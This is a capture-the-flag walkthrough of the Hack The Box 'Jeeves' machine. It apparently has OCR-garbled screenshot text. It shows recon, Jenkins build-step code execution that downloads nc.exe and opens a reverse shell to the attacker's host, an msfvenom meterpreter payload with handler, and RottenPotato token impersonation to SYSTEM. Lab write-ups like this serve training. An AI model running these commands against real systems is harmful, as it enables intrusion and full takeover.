HTB – Jeeves Walkthrough

nmap

PORT 80/tcp STATE SERVICE open http VERSION Microsoft IIS httpd 10.0 I http-methods: Supported methods: OPTIONS TRACE GET HEAD POST Potentially risky methods: TRACE I http-server-header: Microsoft-IIS/ 10.0 I http-title: Ask Jeeves 135/tcp open msrpc Microsoft Windows RPC open microsoft-ds Microsoft Windows 7 10 microsoft-ds (workgroup: 445/tcp WORKGROUP) 50000/tcp open http Jetty 9.4. z-SNAPSHOT I http-server-header: Jetty (9.4. z-SNAPSHOT) I http-title: Error 404 Not Found Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: I smb2-security-mode: 2.10: message signing enabled but not required I smb2-time: Protocol negotiation failed (SP182)

gobuster

root@kali: /home/kalisa/HTB/jeeves 158x43 gobuster -u http://10.10.10.63:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt OJ Reeves (@TheColonial) Gobuster v2.O.1 mode Url/Domain Threads Wordlist Status codes Timeout . dir http://10.10.10.63:50000/ 10 /usr/share/wordlists/dirbuster/directory-list-2.3-medium . txt , 403 IOS 2019/07/07 starting gobuster /askjeeves (Status: 302) Progress: 117951 / 220561 (53.48%)

Jenkins 

Code Execution

Create a project on Jenkins

(9 0.10.14.4443 >/tmp/f + Jenkins All 10.10.10.63:50000/askjeeves/view/all/newJ0b Enter an item name kalisa Required field Freestyle project Ill \ This is the central feature of Jenkins. Jenkins will build your project, combining any SCM with any build system, and this can be even used for something other than software build. Pipeline Orchestrates long-running activities that can span multiple build slaves. Suitable for building pipelines (formerly known as workflows) and/or organizing complex activities that do not easily fit in free-style jab type. Multi-configuration project Suitable for prpjects that need a large number of different configurations, such as testing on multiple environments, platform-specific builds, etc. Folder Creates a container that stores nested items in it. Useful for grouping things together. Unlike view, which is just a filter, a folder creates a separate namespace, so you can have multiple things of the same name as long as they are in different folders. GitHub Organization Scans a GitHub organization (or user account) for all repositories matching some defined markers. Multibranch Pipeline Creates a set of Pipeline prpjects according to detected branches in one SCM repository. OK

Low Privileged Shell

Enter commands under Build Section

Powershell wget “http://10.10.14.4:8000/nc.exe” -outfile “nc.exe”

Nc.exe 10.10.14.4 7777 -e cmd.exe

Build Execute Windows batch command Command "http://10.10.14.13:8000/nc.exe nc.exe 10.10.14.13 7777 -e cmd.exe See the list of available environment variables Add build step Post-build Actions " -out file "nc.exe" Advanced.- Save Apply

And listened on python SimpleHTTPServer to send the nc.exe file and started to listen on port 7777 with nc for a reverse shell

python -m SimpleHTTPServer serving HTTP on O.O.O.O port 8000 10.10.10.63 [07/Ju1/2019 "GET /nc.exe HTTP/I.I" 200 root@kali: /home/kalisa/HTB/jeeves 158x26 nc -nlvp 7777 listening on [any] 7777 connect to [10.10. 14.13] from (UNKNOWN) [10.10. 10.63] 49677 Microsoft Windows [Version 10.0. 10586] (c) 2015 Microsoft Corporation. All rights reserved. C : rx . j enkins\wo

Meterpreter Shell

Create a shell with the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Upload the executable file as shell.exe

Build Execute Windows batch command Command "http://10.10.14.13:8000/shell.exe " -out file "shell.exe" Advanced.- Save shell.exe See the list of available environment variables Apply

And listen on metasploit

root@kati : /home/katisa/HTB/ j eeves# metasploit v5.O.29-dev msfconsole 1899 exploits 1068 auxiliary 547 payloads - 44 encoders 10 2 evasion [ Starting persistent handler(s)... msf5 > use exploit/ multi/ handler msf5 exploit (multi/handter) > set payload 329 nops post windows/ meterpreter/reverse tcp payload => windows/ meterpreter/reverse tcp msf5 exploit (multi/handter) > set LHOST 10.10. 14.13 LHOST 10.10. 14.13 msf5 exploit (multi/handter) > set LPORT 8888 LPORT 8888 msf5 exploit (multi/handter) > run [ Started reverse TCP handler on 10.10.14.13:8888 sending stage (179779 bytes) to 10.10. 10.63 meterpreter session 1 opened (10.10.14.13:8888 10.10.10.63:49679) at 2019-07-07 meterpreter > -0400

Privilege Escalation

I checked with whoami/priv command and saw that SeImpersonatePrivilege is enabled

whoami / priv PRIVILEGES INFORMATION Privilege Name SeShutdownPrivilege SeChangeNotifyPrivilege SeUndockPrivilege Selmpersonateprivilege SecreateGlobalPrivilege SelncreaseWorkingSetPrivilege SeTimeZonePrivilege / priv Description Shut down the system Bypass traverse checking Remove computer from docking station Impersonate a client after authentication Create global objects Increase a process working set Change the time zone State Disabled Enabled Disabled Enabled Enabled Disabled Disabled

I first loaded incognito with the command load incognito on meterpreter

list tokens and you’ll see no token available.

Upload rottenpotato.exe and execute the file 

meter preter > list tokens -g [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM Delegation Tokens Available BUILTIN\Users NT AUTHORITY\Authenticated Users NT AUTHORITY\Loca1 account NT AUTHORITY\LogonSession1d 0 116102 NT AUTHORITY\NTLM Authentication NT AUTHORITY\SERVICE NT AUTHORITY\This organization Impersonation Tokens Available No tokens available meter preter > execute Process 3536 created. Channel 3 created. -f rot. exe

list tokens again and you’ll see administrator token now

meter preter > list tokens -g [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM Delegation Tokens Available BUILTIN\Users NT AUTHORITY\Authenticated Users NT AUTHORITY\Loca1 account NT AUTHORITY\LogonSession1d 0 116102 NT AUTHORITY\NTLM Authentication NT AUTHORITY\SERVICE NT AUTHORITY\This organization Impersonation Tokens Available BUILTIN\Administrators NT AUTHORITY\LogonSession1d 0 82652 NT SERVICE\BITS NT SERVICE\DsmSvc SERVICE-\iphlpsvc NT NT SERVICE-Uanmanserver SERVICE-Ufsvc NT SERVICE\Schedu1e NT NT SERVICE-NSE-NS SERVICE\She11HWDetection NT SERVICE\Winmgmt NT NT SERVICE-\wuauserv

Now impersonate the token and become NT AUTHORITY\SYSTEM

meterpreter > impersonate token "BUILTIN\Administrators" [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM [-] No delegation token available [+] Successfully impersonated user NT AUTHORITY\SYSTEPI meter preter > getuid server username: NT AUTHORITY\SYSTEM meterpreter >

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.